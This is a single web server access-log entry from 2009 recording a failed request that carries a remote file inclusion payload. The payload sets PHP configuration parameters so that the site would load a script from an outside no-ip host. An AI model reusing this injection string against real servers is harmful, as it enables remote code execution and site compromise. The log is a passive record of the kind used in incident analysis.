222.122.72.246 - - [29/Nov/2009:23:43:27 -0800] "GET /logs/access_091026.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://mubankaii.no-ip.biz:8090//appserv/sid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
